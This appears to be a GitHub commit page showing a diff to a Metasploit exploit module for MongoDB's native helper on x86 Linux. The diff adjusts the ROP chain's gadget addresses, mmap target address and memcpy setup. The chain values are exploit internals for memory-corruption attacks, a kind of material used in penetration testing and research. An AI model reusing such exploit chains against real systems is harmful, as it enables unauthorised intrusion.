We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 6b639ad commit cc598bfCopy full SHA for cc598bf
modules/exploits/linux/misc/mongod_native_helper.rb
@@ -33,18 +33,18 @@ def initialize(info={})
33
{
34
'Arch' => ARCH_X86,
35
'mmap' => [
36
- 0x0816f768, #mmap_64@plt
37
- 0x8666d07, #add esp, 0x14 / pop ebx / pop ebp / ret
38
- 0x0c0c0000,
+ 0x0816f768, #mmap64@plt
+ 0x8666d07, #add esp, 0x14 / pop ebx / pop ebp / ret
+ 0x31337000,
39
0x00002000,
40
0x00000007,
41
0x00000031,
42
0xffffffff,
43
0x00000000,
44
- 0x78696761,
+ 0x00000000,
45
0x0816e4c8, #memcpy@plt
46
- 0x0c0c0c0c,
47
48
0x0c0b0000,
49
0x00002000
50
],
0 commit comments